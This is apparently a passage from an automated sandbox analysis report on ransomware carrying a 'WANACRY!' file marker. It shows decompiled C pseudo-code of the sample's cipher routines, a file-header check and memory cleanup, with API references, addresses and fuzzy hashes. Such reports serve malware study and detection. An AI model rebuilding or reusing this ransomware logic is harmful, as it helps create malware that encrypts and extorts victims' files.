									goto L51;
								}
								_a8 = _t329;
								do {
									_t317 =  &(_t291[1]);
									 *_t205 = ( *_t291 & 0x000000ff) << 0x18;
									 *_t205 =  *_t205 | ( *_t317 & 0x000000ff) << 0x00000010;
									_t319 =  &(_t317[2]);
									 *_t205 =  *_t205 |  *_t319 & 0x000000ff;
									_t291 =  &(_t319[1]);
									_t205 =  &(_t205[1]);
									_t60 =  &_a8;
									 *_t60 = _a8 - 1;
								} while ( *_t60 != 0);
								goto L31;
							}
							_t280 = _t352 + 0x1e8;
							do {
								_t320 = _a12;
								if(_t320 > 0) {
									memset(_t280, 0, _t320 << 2);
									_t354 = _t354 + 0xc;
								}
								_t327 = _t327 + 1;
								_t280 = _t280 + 0x20;
							} while (_t327 <=  *((intOrPtr*)(_t352 + 0x410)));
							goto L28;
						}
						_t281 = _t352 + 8;
						do {
							_t322 = _a12;
							if(_t322 > 0) {
								memset(_t281, 0, _t322 << 2);
								_t354 = _t354 + 0xc;
							}
							_t326 = _t326 + 1;
							_t281 = _t281 + 0x20;
						} while (_t326 <=  *((intOrPtr*)(_t352 + 0x410)));
						goto L23;
					}
					 *((intOrPtr*)(_t352 + 0x410)) = 0xe;
					goto L18;
				}
			}

0x00402a83
0x00402a85
0x00402a8e
0x00402a95
0x00402a9e
0x00402aa3
0x00402aa4
0x00402aa4
0x00402aa9
0x00402aae
0x00402ab1
0x00402ab4
0x00402ac2
0x00402ac6
0x00402acd
0x00402ad6
0x00402adb
0x00402adc
0x00402adc
0x00402ae1
0x00402ae6
0x00402af4
0x00402af8
0x00402aff
0x00402b05
0x00402b08
0x00402b0d
0x00402b0e
0x00402b0e
0x00402b14
0x00402b23
0x00402b2a
0x00402b3f
0x00402b44
0x00402b4a
0x00402b4f
0x00402b75
0x00402b7d
0x00402b92
0x00402b7f
0x00402b81
0x00402b81
0x00000000
0x00402b51
0x00402b53
0x00402b70
0x00402b94
0x00402b94
0x00402b9a
0x00402ba2
0x00402ba3
0x00402ba6
0x00402bae
0x00402bb1
0x00402bcf
0x00402bcf
0x00402bd7
0x00402bf8
0x00402c00
0x00402c01
0x00402c0b
0x00402c0e
0x00402c12
0x00402c15
0x00402c17
0x00402c1f
0x00402c22
0x00402c4e
0x00402c4e
0x00402c54
0x00402ca5
0x00402ca8
0x00402e04
0x00402e06
0x00402e0d
0x00402e10
0x00402e73
0x00402e73
0x00402e7b
0x00402e7b
0x00402e18
0x00402e1b
0x00402e1b
0x00402e20
0x00000000
0x00000000
0x00402e22
0x00402e25
0x00402e25
0x00402e29
0x00402e59
0x00402e5b
0x00402e5e
0x00402e5e
0x00402e61
0x00402e61
0x00402e64
0x00402e68
0x00402e6b
0x00000000
0x00402e1b
0x00402cae
0x00402cb5
0x00402cb5
0x00402cbf
0x00402d05
0x00402d0b
0x00402d11
0x00402d34
0x00402d3a
0x00402d3b
0x00402d3e
0x00402d40
0x00402d43
0x00402d43
0x00402d46
0x00402d4e
0x00402d8f
0x00402d95
0x00402d9b
0x00402d9c
0x00402d9f
0x00402da1
0x00402da4
0x00402da4
0x00402da7
0x00402da7
0x00402dad
0x00000000
0x00000000
0x00402daf
0x00402db5
0x00402dbf
0x00402dc3
0x00402dc8
0x00402dc9
0x00402dcf
0x00402ddb
0x00402dde
0x00402de4
0x00402de6
0x00402de9
0x00402dec
0x00402df3
0x00402df9
0x00000000
0x00000000
0x00000000
0x00402df9
0x00000000
0x00402db5
0x00402d16
0x00000000
0x00000000
0x00402d1c
0x00402d22
0x00402d25
0x00402d28
0x00402d2a
0x00402d2d
0x00402d2d
0x00000000
0x00402dfb
0x00402dfb
0x00000000
0x00402cb5
0x00402c56
0x00402c5c
0x00402c6a
0x00402c6e
0x00402c74
0x00402c75
0x00402c7e
0x00402c8b
0x00402c91
0x00402c93
0x00402c96
0x00402c9d
0x00402ca3
0x00000000
0x00000000
0x00000000
0x00402ca3
0x00000000
0x00402c5c
0x00402c24
0x00402c27
0x00402c2d
0x00402c2e
0x00402c36
0x00402c3f
0x00402c43
0x00402c45
0x00402c46
0x00402c49
0x00402c49
0x00402c49
0x00000000
0x00402c27
0x00402bd9
0x00402bdf
0x00402bdf
0x00402be4
0x00402bea
0x00402bea
0x00402bea
0x00402bec
0x00402bed
0x00402bf0
0x00000000
0x00402bdf
0x00402bb3
0x00402bb6
0x00402bb6
0x00402bbb
0x00402bc1
0x00402bc1
0x00402bc1
0x00402bc3
0x00402bc4
0x00402bc7
0x00000000
0x00402bb6
0x00402b55
0x00000000
0x00402b55

APIs

??0exception@@QAE@ABQBD@Z.MSVCRT(?,?,?,00000000,00000010,?), ref: 00402A95
_CxxThrowException.MSVCRT(00000010,0040D570,?,00000000,00000010,?), ref: 00402AA4
??0exception@@QAE@ABQBD@Z.MSVCRT(?,?,?,00000000,00000010,?), ref: 00402ACD
_CxxThrowException.MSVCRT(00000010,0040D570,?,00000000,00000010,?), ref: 00402ADC
??0exception@@QAE@ABQBD@Z.MSVCRT(?,?,?,00000000,00000010,?), ref: 00402AFF
_CxxThrowException.MSVCRT(00000010,0040D570,?,00000000,00000010,?), ref: 00402B0E
memcpy.MSVCRT(?,?,00000010,?,?,00000000,00000010,?,?), ref: 00402B2A
memcpy.MSVCRT(?,?,?,?,?,00000010,?,?,00000000,00000010,?,?), ref: 00402B3F

Strings

, xrefs: 00402E64

Memory Dump Source

Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: ??0exception@@ExceptionThrow$memcpy
String ID:
API String ID: 1881450474-3916222277
Opcode ID: 13455132f19fce7ccee5142b200569a1d3dc411a47d032a17fbb22a214c81369
Instruction ID: fcfef073648f46ce18afaeffe4143d5033c2e410e09e17396796de68d512254b
Opcode Fuzzy Hash: 13455132f19fce7ccee5142b200569a1d3dc411a47d032a17fbb22a214c81369
Instruction Fuzzy Hash: 8DD1C3706006099FDB28CF29C5846EA77F5FF48314F14C43EE95AEB281D778AA85CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004014A6 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 178filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040150D
GetFileSizeEx.KERNEL32(00000000,?), ref: 00401529
memcmp.MSVCRT(?,WANACRY!,00000008), ref: 00401572
GlobalAlloc.KERNEL32(00000000,?,?,?,00000010,?,?,?,?), ref: 0040166D
_local_unwind2.MSVCRT(?,000000FF), ref: 004016D6

Strings

WANACRY!, xrefs: 00401566

Memory Dump Source

Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: File$AllocCreateGlobalSize_local_unwind2memcmp
String ID: WANACRY!
API String ID: 283026544-1240840912
Opcode ID: 3616707767261f84fde6c13708b35c3d4dbb974938da28d5f777545cb9cffa02
Instruction ID: 23909f9b909e50c20e483d6bc4be6e23e355ec3bf8b0a6de4718622c8bde6caa
Opcode Fuzzy Hash: 3616707767261f84fde6c13708b35c3d4dbb974938da28d5f777545cb9cffa02
Instruction Fuzzy Hash: 6E512C71900209ABDB219F95CD84FEEB7BCEB08790F1444BAF515F21A0D739AA45CB28

Uniqueness

Uniqueness Score: -1.00%

Function 0040350F Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 214
COMMONCrypto

Download Yara Rule

C-Code - Quality: 55%

			E0040350F(void* __ecx, signed int _a4, signed char* _a8) {
				signed int _v8;
				signed int _v12;
				signed char _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v56;
				signed int _t150;
				signed int _t151;
				signed int _t155;
				signed int* _t157;
				signed char _t158;
				intOrPtr _t219;
				signed int _t230;
				signed char* _t236;
				signed char* _t237;
				signed char* _t238;
				signed char* _t239;
				signed int* _t240;
				signed char* _t242;
				signed char* _t243;
				signed char* _t245;
				signed int _t260;
				signed int* _t273;
				signed int _t274;
				void* _t275;
				void* _t276;

				_t275 = __ecx;
				if( *((char*)(__ecx + 4)) == 0) {
					__imp__??0exception@@QAE@ABQBD@Z(0x40f570);
					_push(0x40d570);
					_push( &_v56);
					L0040776E();
				}
				_t150 =  *(_t275 + 0x3cc);
				if(_t150 == 0x10) {
					return E00402E7E(_t275, _a4, _a8);
				}
				asm("cdq");
				_t230 = 4;
				_t151 = _t150 / _t230;
				_t274 = _t151;
				asm("sbb eax, eax");
				_t155 = ( ~(_t151 - _t230) & (0 | _t274 != 0x00000006) + 0x00000001) << 5;
				_v28 =  *((intOrPtr*)(_t155 + 0x40bc24));
				_v24 =  *((intOrPtr*)(_t155 + 0x40bc2c));
				_v32 =  *((intOrPtr*)(_t155 + 0x40bc34));
				_t157 = _t275 + 0x454;
				if(_t274 > 0) {
					_v16 = _t274;
					_v8 = _t275 + 8;
					_t242 = _a4;
					do {
						_t243 =  &(_t242[1]);
						 *_t157 = ( *_t242 & 0x000000ff) << 0x18;
						 *_t157 =  *_t157 | ( *_t243 & 0x000000ff) << 0x00000010;
						_t245 =  &(_t243[2]);
						_t273 = _t157;
						 *_t157 =  *_t157 |  *_t245 & 0x000000ff;
						_v8 = _v8 + 4;
						_t242 =  &(_t245[1]);
						_t157 =  &(_t157[1]);
						 *_t273 =  *_t273 ^  *_v8;
						_t27 =  &_v16;
						 *_t27 = _v16 - 1;
					} while ( *_t27 != 0);
				}
				_t158 = 1;
				_v16 = _t158;
				if( *(_t275 + 0x410) > _t158) {
					_v12 = _t275 + 0x28;
					do {
						if(_t274 > 0) {
							_t34 =  &_v28; // 0x403b51
							_t260 =  *_t34;
							_v8 = _v12;
							_a4 = _t260;
							_v36 = _v24 - _t260;
							_t240 = _t275 + 0x434;
							_v40 = _v32 - _t260;
							_v20 = _t274;
							do {
								asm("cdq");
								_v44 = 0;
								asm("cdq");
								asm("cdq");
								_v8 = _v8 + 4;
								 *_t240 =  *(0x4093fc + _v44 * 4) ^  *(0x4097fc + ( *(_t275 + 0x454 + (_v40 + _a4) % _t274 * 4) & 0x000000ff) * 4) ^  *0x00408FFC ^  *0x00408BFC ^  *_v8;
								_t240 =  &(_t240[1]);
								_a4 = _a4 + 1;
								_t84 =  &_v20;
								 *_t84 = _v20 - 1;
							} while ( *_t84 != 0);
						}
						memcpy(_t275 + 0x454, _t275 + 0x434, _t274 << 2);
						_v12 = _v12 + 0x20;
						_t276 = _t276 + 0xc;
						_v16 = _v16 + 1;
						_t158 = _v16;
					} while (_t158 <  *(_t275 + 0x410));
				}
				_v8 = _v8 & 0x00000000;
				if(_t274 > 0) {
					_t236 = _a8;
					_t219 = _v24;
					_a8 = _t275 + 0x454;
					_t100 =  &_v28; // 0x403b51
					_v44 =  *_t100 - _t219;
					_v40 = _v32 - _t219;
					do {
						_a8 =  &(_a8[4]);
						_a4 =  *((intOrPtr*)(_t275 + 8 + (_v8 +  *(_t275 + 0x410) * 8) * 4));
						 *_t236 =  *0x004089FC ^ _a4 >> 0x00000018;
						_t237 =  &(_t236[1]);
						asm("cdq");
						 *_t237 =  *0x004089FC ^ _a4 >> 0x00000010;
						asm("cdq");
						_t238 =  &(_t237[1]);
						 *_t238 =  *0x004089FC ^ _a4 >> 0x00000008;
						_t239 =  &(_t238[1]);
						asm("cdq");
						_t158 =  *(( *(_t275 + 0x454 + (_v40 + _t219) % _t274 * 4) & 0x000000ff) + 0x4089fc) ^ _a4;
						 *_t239 = _t158;
						_t236 =  &(_t239[1]);
						_v8 = _v8 + 1;
						_t219 = _t219 + 1;
					} while (_v8 < _t274);
				}
				return _t158;
			}

0x00403517
0x0040351e
0x00403528
0x00403531
0x00403536
0x00403537
0x00403537
0x0040353c
0x00403545
0x00000000
0x0040354f
0x0040355b
0x0040355c
0x0040355d
0x0040355f
0x0040356e
0x00403572
0x0040357d
0x0040358c
0x0040358f
0x00403592
0x00403598
0x0040359d
0x004035a0
0x004035a3
0x004035a6
0x004035ac
0x004035ad
0x004035b5
0x004035be
0x004035bf
0x004035c4
0x004035c9
0x004035cd
0x004035d0
0x004035d3
0x004035d5
0x004035d5
0x004035d5
0x004035a6
0x004035dc
0x004035e3
0x004035e6
0x004035ef
0x004035f2
0x004035f4
0x004035fd
0x004035fd
0x00403600
0x00403608
0x0040360b
0x00403613
0x00403619
0x0040361c
0x0040361f
0x00403627
0x0040363a
0x0040363d
0x00403660
0x00403682
0x00403688
0x0040368a
0x0040368d
0x00403690
0x00403690
0x00403690
0x0040361f
0x004036a9
0x004036ae
0x004036b2
0x004036b5
0x004036b8
0x004036bb
0x004035f2
0x004036c7
0x004036cd
0x004036d3
0x004036d6
0x004036df
0x004036e2
0x004036e7
0x004036ef
0x004036f2
0x00403701
0x00403709
0x0040371f
0x00403726
0x00403727
0x00403741
0x00403745
0x0040374a
0x00403760
0x00403767
0x00403768
0x0040377d
0x00403780
0x00403782
0x00403783
0x00403786
0x00403787
0x004036f2
0x00403794

APIs

??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570,?,?,?,?,?,?,?,?,?,?,00403B51,?,?,?), ref: 00403528
_CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,?,?,?,00403B51,?,?,?), ref: 00403537
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00403B51,?,?), ref: 004036A9

Strings

, xrefs: 004036AE
Q;@, xrefs: 004036E2, 004035FD

Memory Dump Source

Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: ??0exception@@ExceptionThrowmemcpy
String ID: $Q;@
API String ID: 2382887404-262343263
Opcode ID: 68433a68c8f87a96c4578501cf6b50a347b0c2ca376bc2ea45e1a632b2ad4c4a
Instruction ID: bc36c6e363c45e845c5013d3ee32ff29fee655b638a1b5d52e43d816bbd12583
Opcode Fuzzy Hash: 68433a68c8f87a96c4578501cf6b50a347b0c2ca376bc2ea45e1a632b2ad4c4a
Instruction Fuzzy Hash: A581C3759002499FCB05CF68C9809EEBBF5EF89308F2484AEE595E7352C234BA45CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00403797 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 214
COMMONCrypto

Download Yara Rule

C-Code - Quality: 54%

			E00403797(void* __ecx, signed int _a4, signed char* _a8) {
				signed int _v8;
				signed int _v12;
				signed char _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				char _v56;
				signed int _t150;
				signed int _t151;
				signed int _t155;
				signed int* _t157;
				signed char _t158;
				intOrPtr _t219;
				signed int _t230;
				signed char* _t236;
				signed char* _t237;
				signed char* _t238;
				signed char* _t239;
				signed int* _t240;
				signed char* _t242;
				signed char* _t243;
				signed char* _t245;
				signed int _t260;
				signed int* _t273;
				signed int _t274;
				void* _t275;
				void* _t276;

				_t275 = __ecx;
				if( *((char*)(__ecx + 4)) == 0) {
					__imp__??0exception@@QAE@ABQBD@Z(0x40f570);
					_push(0x40d570);
					_push( &_v56);
					L0040776E();
				}
				_t150 =  *(_t275 + 0x3cc);
				if(_t150 == 0x10) {
					return E004031BC(_t275, _a4, _a8);
				}
				asm("cdq");
				_t230 = 4;
				_t151 = _t150 / _t230;
				_t274 = _t151;
				asm("sbb eax, eax");
				_t155 = ( ~(_t151 - _t230) & (0 | _t274 != 0x00000006) + 0x00000001) << 5;
				_v28 =  *((intOrPtr*)(_t155 + 0x40bc28));
				_v24 =  *((intOrPtr*)(_t155 + 0x40bc30));
				_v32 =  *((intOrPtr*)(_t155 + 0x40bc38));
				_t157 = _t275 + 0x454;
				if(_t274 > 0) {
					_v16 = _t274;
					_v8 = _t275 + 0x1e8;
					_t242 = _a4;
					do {
						_t243 =  &(_t242[1]);
						 *_t157 = ( *_t242 & 0x000000ff) << 0x18;
						 *_t157 =  *_t157 | ( *_t243 & 0x000000ff) << 0x00000010;
						_t245 =  &(_t243[2]);
						_t273 = _t157;
						 *_t157 =  *_t157 |  *_t245 & 0x000000ff;
						_v8 = _v8 + 4;
						_t242 =  &(_t245[1]);
						_t157 =  &(_t157[1]);
						 *_t273 =  *_t273 ^  *_v8;
						_t27 =  &_v16;
						 *_t27 = _v16 - 1;
					} while ( *_t27 != 0);
				}
				_t158 = 1;
				_v16 = _t158;
				if( *(_t275 + 0x410) > _t158) {
					_v12 = _t275 + 0x208;
					do {
						if(_t274 > 0) {
							_t260 = _v28;
							_v8 = _v12;
							_a4 = _t260;
							_v36 = _v24 - _t260;
							_t240 = _t275 + 0x434;
							_v40 = _v32 - _t260;
							_v20 = _t274;
							do {
								asm("cdq");
								_v44 = 0;
								asm("cdq");
								asm("cdq");
								_v8 = _v8 + 4;
								 *_t240 =  *(0x40a3fc + _v44 * 4) ^  *(0x40a7fc + ( *(_t275 + 0x454 + (_v40 + _a4) % _t274 * 4) & 0x000000ff) * 4) ^  *0x00409FFC ^  *0x00409BFC ^  *_v8;
								_t240 =  &(_t240[1]);
								_a4 = _a4 + 1;
								_t84 =  &_v20;
								 *_t84 = _v20 - 1;
							} while ( *_t84 != 0);
						}
						memcpy(_t275 + 0x454, _t275 + 0x434, _t274 << 2);
						_v12 = _v12 + 0x20;
						_t276 = _t276 + 0xc;
						_v16 = _v16 + 1;
						_t158 = _v16;
					} while (_t158 <  *(_t275 + 0x410));
				}
				_v8 = _v8 & 0x00000000;
				if(_t274 > 0) {
					_t236 = _a8;
					_t219 = _v24;
					_a8 = _t275 + 0x454;
					_v44 = _v28 - _t219;
					_v40 = _v32 - _t219;
					do {
						_a8 =  &(_a8[4]);
						_a4 =  *((intOrPtr*)(_t275 + 0x1e8 + (_v8 +  *(_t275 + 0x410) * 8) * 4));
						 *_t236 =  *0x00408AFC ^ _a4 >> 0x00000018;
						_t237 =  &(_t236[1]);
						asm("cdq");
						 *_t237 =  *0x00408AFC ^ _a4 >> 0x00000010;
						asm("cdq");
						_t238 =  &(_t237[1]);
						 *_t238 =  *0x00408AFC ^ _a4 >> 0x00000008;
						_t239 =  &(_t238[1]);
						asm("cdq");
						_t158 =  *(( *(_t275 + 0x454 + (_v40 + _t219) % _t274 * 4) & 0x000000ff) + 0x408afc) ^ _a4;
						 *_t239 = _t158;
						_t236 =  &(_t239[1]);
						_v8 = _v8 + 1;
						_t219 = _t219 + 1;
					} while (_v8 < _t274);
				}
				return _t158;
			}

0x0040379f
0x004037a6
0x004037b0
0x004037b9
0x004037be
0x004037bf
0x004037bf
0x004037c4
0x004037cd
0x00000000
0x004037d7
0x004037e3
0x004037e4
0x004037e5
0x004037e7
0x004037f6
0x004037fa
0x00403805
0x00403814
0x00403817
0x0040381a
0x00403820
0x00403828
0x0040382b
0x0040382e
0x00403831
0x00403837
0x00403838
0x00403840
0x00403849
0x0040384a
0x0040384f
0x00403854
0x00403858
0x0040385b
0x0040385e
0x00403860
0x00403860
0x00403860
0x00403831
0x00403867
0x0040386e
0x00403871
0x0040387d
0x00403880
0x00403882
0x0040388b
0x0040388e
0x00403896
0x00403899
0x004038a1
0x004038a7
0x004038aa
0x004038ad
0x004038b5
0x004038c8
0x004038cb
0x004038ee
0x00403910
0x00403916
0x00403918
0x0040391b
0x0040391e
0x0040391e
0x0040391e
0x004038ad
0x00403937
0x0040393c
0x00403940
0x00403943
0x00403946
0x00403949
0x00403880
0x00403955
0x0040395b
0x00403961
0x00403964
0x0040396d
0x00403975
0x0040397d
0x00403980
0x0040398f
0x0040399a
0x004039b0
0x004039b7
0x004039b8
0x004039d2
0x004039d6
0x004039db
0x004039f1
0x004039f8
0x004039f9
0x00403a0e
0x00403a11
0x00403a13
0x00403a14
0x00403a17
0x00403a18
0x00403980
0x00403a25

APIs

??0exception@@QAE@ABQBD@Z.MSVCRT(0040F570,?,?,?,?,?,?,?,?,?,?,00403B9C,?,?,?), ref: 004037B0
_CxxThrowException.MSVCRT(?,0040D570,?,?,?,?,?,?,?,00403B9C,?,?,?), ref: 004037BF
memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,00403B9C,?,?), ref: 00403937

Strings

, xrefs: 0040393C

Memory Dump Source

Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: ??0exception@@ExceptionThrowmemcpy
String ID:
API String ID: 2382887404-3916222277
Opcode ID: f4b5f5b39d3fd1fccf69c885608927ed404fa65085bd71c262b9c8f9e9248758
Instruction ID: 1cfba4d829132d5223a2741c68a06c6b284a50eb41fad236877f379c856cacdf
Opcode Fuzzy Hash: f4b5f5b39d3fd1fccf69c885608927ed404fa65085bd71c262b9c8f9e9248758
Instruction Fuzzy Hash: B991C375A002499FCB05CF69C480AEEBBF5FF89315F2480AEE595E7342C234AA45CF58

Uniqueness

Uniqueness Score: -1.00%

Function 004029CC Relevance: 3.8, APIs: 3, Instructions: 55
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004029CC(void* _a4) {
				void* _t17;
				intOrPtr _t18;
				intOrPtr _t23;
				intOrPtr _t25;
				signed int _t35;
				void* _t37;

				_t37 = _a4;
				if(_t37 != 0) {
					if( *((intOrPtr*)(_t37 + 0x10)) != 0) {
						_t25 =  *((intOrPtr*)(_t37 + 4));
						 *((intOrPtr*)( *((intOrPtr*)( *_t37 + 0x28)) + _t25))(_t25, 0, 0);
					}
					if( *(_t37 + 8) == 0) {
						L9:
						_t18 =  *((intOrPtr*)(_t37 + 4));
						if(_t18 != 0) {
							 *((intOrPtr*)(_t37 + 0x20))(_t18, 0, 0x8000,  *((intOrPtr*)(_t37 + 0x30)));
						}
						return HeapFree(GetProcessHeap(), 0, _t37);
					} else {
						_t35 = 0;
						if( *((intOrPtr*)(_t37 + 0xc)) <= 0) {
							L8:
							free( *(_t37 + 8));
							goto L9;
						} else {
							goto L5;
						}
						do {
							L5:
							_t23 =  *((intOrPtr*)( *(_t37 + 8) + _t35 * 4));
							if(_t23 != 0) {
								 *((intOrPtr*)(_t37 + 0x2c))(_t23,  *((intOrPtr*)(_t37 + 0x30)));
							}
							_t35 = _t35 + 1;
						} while (_t35 <  *((intOrPtr*)(_t37 + 0xc)));
						goto L8;
					}
				}
				return _t17;
			}

0x004029ce
0x004029d6
0x004029db
0x004029df
0x004029ea
0x004029ea
0x004029ef
0x00402a1d
0x00402a1d
0x00402a22
0x00402a2e
0x00402a31
0x00000000
0x004029f1
0x004029f2
0x004029f7
0x00402a12
0x00402a15
0x00000000
0x00000000
0x00000000
0x00000000
0x004029f9
0x004029f9
0x004029fc
0x00402a01
0x00402a07
0x00402a0b
0x00402a0c
0x00402a0d
0x00000000
0x004029f9
0x004029ef
0x00402a45

APIs

free.MSVCRT(?,00402198,00000000,00000000,0040243C,00000000), ref: 00402A15
GetProcessHeap.KERNEL32(00000000,00000000,00000000,00000000,0040243C,00000000), ref: 00402A36
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00402185,00402198,004021A3,004021B2,00000000), ref: 00402A3D

Memory Dump Source

Source File: 00000002.00000002.255070484.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.255064310.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255084606.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255096631.000000000040E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.255115219.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File

Yara matches

Similarity

API ID: Heap$FreeProcessfree
String ID:
API String ID: 3428986607-0
Opcode ID: 67af2f346d87749f9cdb855264ac8d2816ecbe8db690f3f12af5f99a0e11ec4c
Instruction ID: 6307eaad725422957632c7c85bafc458d1caddc7471a2505469f2591130cc2ff
Opcode Fuzzy Hash: 67af2f346d87749f9cdb855264ac8d2816ecbe8db690f3f12af5f99a0e11ec4c
Instruction Fuzzy Hash: C4010C72600A019FCB309FA5DE88967B7E9FF48321354483EF196A2591CB75F841CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00402E7E Relevance: 3.3, APIs: 2, Instructions: 272
COMMONCrypto

Download Yara Rule

C-Code - Quality: 34%

			E00402E7E(intOrPtr __ecx, signed int* _a4, signed char* _a8) {
				signed int _v8;
				void* _v9;
				void* _v10;
				void* _v11;
				signed int _v12;
				void* _v13;
				void* _v14;
				void* _v15;
				signed int _v16;
				void* _v17;
				void* _v18;
				void* _v19;
				signed int _v20;
				void* _v21;
				void* _v22;
				signed int _v24;
				signed int _v28;
				intOrPtr _v32;
				char _v44;
				signed char* _t151;
				signed char* _t154;
				signed char* _t155;
				signed char* _t158;
				signed char* _t159;
				signed char* _t160;
				signed char* _t162;
				signed int _t166;
				signed int _t167;
				signed char* _t172;
				signed int* _t245;
				signed int _t262;
				signed int _t263;
				signed int _t278;
				signed int _t279;
				signed int _t289;
				signed int _t303;
				intOrPtr _t344;
				void* _t345;
				signed int _t346;

				_t344 = __ecx;
				_v32 = __ecx;
				if( *((char*)(__ecx + 4)) == 0) {
					__imp__??0exception@@QAE@ABQBD@Z(0x40f570);
					_push(0x40d570);
					_push( &_v44);
					L0040776E();
				}
				_t151 = _a4;
				_t154 =  &(_t151[3]);
				_t155 =  &(_t154[1]);
				_t278 = (( *_t151 & 0x000000ff) << 0x00000018 | (_t151[1] & 0x000000ff) << 0x00000010 |  *_t154 & 0x000000ff) ^  *(_t344 + 8);
				_v20 = _t278;
				_t158 =  &(_t155[3]);
				_t159 =  &(_t158[1]);
				_t160 =  &(_t159[1]);
				_v16 = ((_t154[1] & 0x000000ff) << 0x00000018 | (_t155[1] & 0x000000ff) << 0x00000010 |  *_t158 & 0x000000ff) ^  *(_t344 + 0xc);
				_t162 =  &(_t160[2]);
				_t163 =  &(_t162[1]);
				_t262 = (( *_t159 & 0x000000ff) << 0x00000018 | ( *_t160 & 0x000000ff) << 0x00000010 |  *_t162 & 0x000000ff) ^  *(_t344 + 0x10);
				_v24 = _t262;
				_t166 =  *(_t344 + 0x410);
				_v28 = _t166;
				_v12 = ((_t162[1] & 0x000000ff) << 0x00000018 | (_t163[1] & 0x000000ff) << 0x00000010) ^  *(_t344 + 0x14);
				if(_t166 > 1) {
					_a4 = _t344 + 0x30;
					_v8 = _t166 - 1;
					do {
						_t245 =  &(_a4[8]);
						_a4 = _t245;
						_v24 =  *0x00408FFC ^  *0x00408BFC ^  *0x004093FC ^  *(0x4097fc + (_v16 & 0x000000ff) * 4) ^  *_a4;
						_v16 =  *0x004093FC ^  *0x00408FFC ^  *0x00408BFC ^  *(0x4097fc + (_t278 & 0x000000ff) * 4) ^  *(_a4 - 4);
						_v12 =  *0x00408BFC ^  *0x004093FC ^  *0x00408FFC ^  *(0x4097fc + (_t262 & 0x000000ff) * 4) ^  *(_t245 - 0x1c);
						_t262 = _v24;
						_v24 = _t262;
						_t278 =  *0x004093FC ^  *0x00408FFC ^  *0x00408BFC ^  *(0x4097fc + (_v12 & 0x000000ff) * 4) ^  *(_t245 - 0x28);
						_t80 =  &_v8;
						 *_t80 = _v8 - 1;
						_v20 = _t278;
					} while ( *_t80 != 0);
					_t166 = _v28;
					_t344 = _v32;
				}
				_t167 = _t166 << 5;
				_t86 = _t344 + 8; // 0x8bf9f759
				_t279 =  *(_t167 + _t86);
				_t88 = _t344 + 8; // 0x40355c
				_t345 = _t167 + _t88;
				_v8 = _t279;
				_t172 = _a8;
				 *_t172 =  *0x004089FC ^ _t279 >> 0x00000018;
				_t172[1] =  *0x004089FC ^ _t279 >> 0x00000010;
				_t97 = _t262 + 0x4089fc; // 0x6bf27b77
				_t172[2] =  *_t97 ^ _v8 >> 0x00000008;
				_t172[3] =  *((_v12 & 0x000000ff) + 0x4089fc) ^ _v8;
				_t104 = _t345 + 4; // 0x33c12bf8
				_t289 =  *_t104;
				_v8 = _t289;
				_t172[4] =  *0x004089FC ^ _t289 >> 0x00000018;
